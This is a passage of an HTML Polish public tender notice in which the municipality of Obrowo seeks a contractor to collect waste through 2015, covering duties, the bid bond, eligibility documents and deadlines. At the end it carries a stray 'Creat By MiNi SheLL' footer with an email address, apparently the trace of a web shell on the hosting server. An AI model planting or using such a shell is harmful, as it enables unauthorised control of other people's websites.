           9)Wyposażony w legalizowaną wagę najazdową - w przypadku, gdy na terenie bazy następuje
              magazynowanie odpadów.
32.Wykonawca po zawarciu umowy z Zamawiającym zobowiązany jest do niezwłocznego
        przeszkolenia pracowników PSZOK-u w zakresie obsługi punktu, zasad kierowania
        poszczególnych frakcji odpadów do określonych kontenerów, obsługi administracyjnej i zasad
        współpracy z Wykonawcą pod kątem wywozu odpadów do RIPOK. Pracownicy stanowiący
        obsługę PSZOK- u będą pracownikami Zamawiającego.  
33.Wykonawca zobowiązany będzie do opracowania i dostarczenia mieszkańcom harmonogramu
         wywozu odpadów zmieszanych oraz odpadów segregowanych. Harmonogram wywozu 
         w odniesieniu do odpadów zmieszanych powinien określać dzień tygodnia, w którym będzie
         realizowany wywóz, natomiast w odniesieniu do odpadów segregowanych konkretne soboty
         miesiąca, a odpadów wielkogabarytowych, konkretny dzień roku. Wywóz odpadów
        segregowanych z terenu gminy Obrowo powinien następować w określone soboty miesiąca,
        ustalone z Wykonawcą.
        Wykonawca musi opracować harmonogram wywozu do czasu trwania umowy. 
        Harmonogram wywozu wykonawca dostarczy mieszkańcom w terminach do: 
		 1) 01 sierpnia 2015 r., na 5 m-cy.
34. Wykonawca zobowiązany będzie do opracowania i dostarczenia mieszkańcom informacji jak
         należy prawidłowo segregować odpady.
35. Wykonawca w ramach zamówienia zobowiązany będzie do zrealizowania wywozu odpadów
          wielkogabarytowych z nieruchomości zamieszkałych. Wywóz odpadów wielkogabarytowych
          powinien być zrealizowany dwukrotnie w ciągu roku kalendarzowego. Wywóz winien
          odbyć się w okresie wrzesień/październik, zgodnie z zestawieniem posesji przekazanym przez
         Zamawiającego, z których należy odebrać odpady wielkogabarytowe.
36. Wykonawca może skorzystać z podwykonawcy w realizacji usług, pod warunkiem uzyskania 
         zgody Zamawiającego na zakres i osobę podwykonawcy.
         Zamawiający żąda wskazania przez wykonawcę w ofercie zakresu zamówienia, który 
         zostanie powierzony podwykonawcy.
         W przypadku, o którym mowa w zdaniu poprzednim Wykonawca zobowiązany jest do
         nadzorowania osób lub podmiotów, przy pomocy których realizować będzie przedmiot
         zamówienia i odpowiada za ich działania jak za własne.
         Zamawiający nie ogranicza jednocześnie możliwości wspólnego występowania przy
         realizacji tego zamówienia kilku podmiotów, np. w formie konsorcjum. 
37. Dodatkowy opis przedmiotu zamówienia:
   a)  Wykonawca zobowiązany jest do ważenia wszystkich odebranych odpadów komunalnych na
         legalizowanej wadze.
   b) Wykonawca zobowiązany jest do dostarczenia odpadów na własny koszt do instalacji
           przewidzianej do zastępczej obsługi w przypadku awarii regionalnej instalacji.
    c) Wykonawca jest zobowiązany do odebrania każdej ilości odpadów, stanowiących przedmiot
          zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego, w trybie i na
          zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy PZP.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.51.00.00-2, 90.51.20.00-9, 90.51.40.00-3, 90.53.30.00-2, 34.92.84.80-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1. Zamawiający żąda wniesienia wadium w kwocie 15.000 zł, słownie: piętnaście tysięcy złotych
      (art. 45 ustawy Pzp). Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania
      ofert określonego w pkt. 11.1. do godz. 10.40.
 9.2. Wadium może zostać wniesione w jednej lub kilku następujących formach:
	   a) pieniądzu,
	   b) poręczeniach bankowych,
	   c) gwarancjach bankowych,
	   d) gwarancjach ubezpieczeniowych,
	   e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2
                    ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
                    (Dz. U. z 2007 r. Nr 42 poz. 275).
9.3. Wadium wnoszone w pieniądzu należy wpłacić na konto Urzędu Gminy Obrowo w Banku
        Spółdzielczym w Grębocinie Nr 61 9491 0003 0020 0006 0091 0003 (za datę i godzinę
        wniesienia wadium w pieniądzu liczy się datę i godzinę wpływu pieniędzy na konto
        Zamawiającego). 
      9.3.1. Wpłaty dokonywane przelewem powinny mieć na przelewie wyraźny napis: WADIUM -
                 Usługa odbioru i zagospodarowania odpadów komunalnych z posesji zamieszkałych 
                  i niezamieszkałych, położonych na terenie Gminy Obrowo.
      9.3.2. W przypadku wniesienia wadium w pozostałych dopuszczalnych formach, określonych w
                 pkt 9.2, do oferty należy dołączyć oryginał dokumentu potwierdzający wniesienie wadium.
               Zaleca się dołączyć do oferty kserokopię dokumentu o którym mowa powyżej,
               poświadczoną za zgodność z oryginałem przez Wykonawcę. Zamawiający zwracając
                 wadium w trybie art. 46 ustawy Prawo zamówień publicznych zwróci Wykonawcy oryginał
                dokumentu wadium. W dokumentacji przetargowej zostanie poświadczona za zgodność 
                 z oryginałem kserokopia zwróconego dokumentu wadium. Wobec powyższego zaleca się
                 nie spinać w sposób trwały oryginału dokumentu potwierdzającego wniesienie wadium 
                z ofertą.
9.4. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 46 ust. 1 ustawy Pzp, z
       zastrzeżeniem art. 46 ust 4a niniejszej ustawy, niezwłocznie po:
        a) wyborze oferty najkorzystniejszej z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, 
        b) unieważnieniu postępowania.
 9.5. Zamawiający zatrzyma wniesione wadium w przypadkach określonych w art. 46 ust. 
         4a i 5 ustawy Pzp.
 9.6. Wykonawca dołącza do składanej oferty dowód wniesienia wadium w oryginale, bądź 
         w poświadczonej za zgodność z oryginałem kopii, podpisanej przez osobę uprawnioną do 
         składania oświadczeń woli w imieniu wykonawcy. 
9.7.	Brak wniesienia wadium w wymaganym terminie spowoduje wykluczenie wykonawcy 
z prowadzonego postępowania (art. 24 ust. 2, pkt. 4 ustawy Pzp).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę, jeżeli: złoży wraz z ofertą oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych; metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek udziału w postępowaniu będzie spełniony, jeżeli Wykonawca wykaże, że wykonywał usługi odbioru odpadów komunalnych, np. sprawozdanie M-09 o wywozie i unieszkodliwianiu odpadów, sprawozdanie G-06 o surowcach wtórnych oraz załączy dokument potwierdzający, że te usługi zostały wykonane lub są wykonywane należycie (załącznik nr 5 do SIWZ).

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek udziału w postępowaniu zostanie uznany za spełniony na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy Pzp (załącznik nr 3 do SIWZ). Zamawiający uzna warunek za spełniony, jeżeli wykonawca:
a) będzie dysponował bazą magazynowo - transportową usytuowaną na terenie Gminy Obrowo lub 
    w odległości nie większej niż 60 km od granic tej gminy;
b) będzie dysponował co najmniej specjalistycznymi środkami transportu, gromadzenia odpadów
    komunalnych w ilości zapewniającej realizację zamówienia, zgodnie z pkt. 3.27 SIWZ.
Wykonawca jest zobowiązany do wykazania podstawy do dysponowania wyżej opisanymi pojazdami poprzez złożenie odpowiedniego oświadczenia - załącznik nr 6 do SIWZ. 
Jeśli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia z winy Wykonawcy pojemników, Wykonawca w trakcie realizacji zamówienia zobowiązany będzie do dodatkowego dostarczenia pojemników na swój koszt.
Do zbierania odpadów komunalnych mogą być stosowane pojemniki i worki odpowiadające obowiązującym normom prawnym.  
Wykonawca w tym zakresie składa odpowiednie oświadczenie w formularzu ofertowym - załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek udziału w postępowaniu został spełniony, jeżeli Wykonawca przedstawi opłaconą polisę, a w przypadku jej braku inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem  zamówienia. 

Ocena spełnienia tego warunku zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	formularz oferty (załącznik nr 1 do SIWZ),
2)	formularz cenowy (załącznik nr 2 do SIWZ),
3) zaparafowany projekt umowy stanowiący załącznik nr 7 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - czas reakcji na zgłoszenie - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>12.12.	Zamawiający dopuszcza możliwość zmiany cen wskutek zmiany stawki podatku od towarów i usług VAT. Zmiana ustawowej wysokości podatku VAT powoduje odpowiednią zmianę łącznego wynagrodzenia licząc od daty wprowadzenia zmiany. Naliczenie podatku VAT w nowej wysokości dopuszcza się tylko od wynagrodzenia za tę część umowy realizowaną po dniu wejścia w życie przepisów ustalających zmiany stawki VAT. Podstawą do zmiany stawki podatku VAT jest podpisanie aneksu do umowy z Wykonawcą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.obrowo.pl, www.bip.obrowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Obrowo
ul. Aleja Lipowa 27
87-126 Obrowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2015 godzina 11:00, miejsce: Urząd Gminy Obrowo
sekretariat (pokój nr 1)
ul. Aleja Lipowa 27
87-126 Obrowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com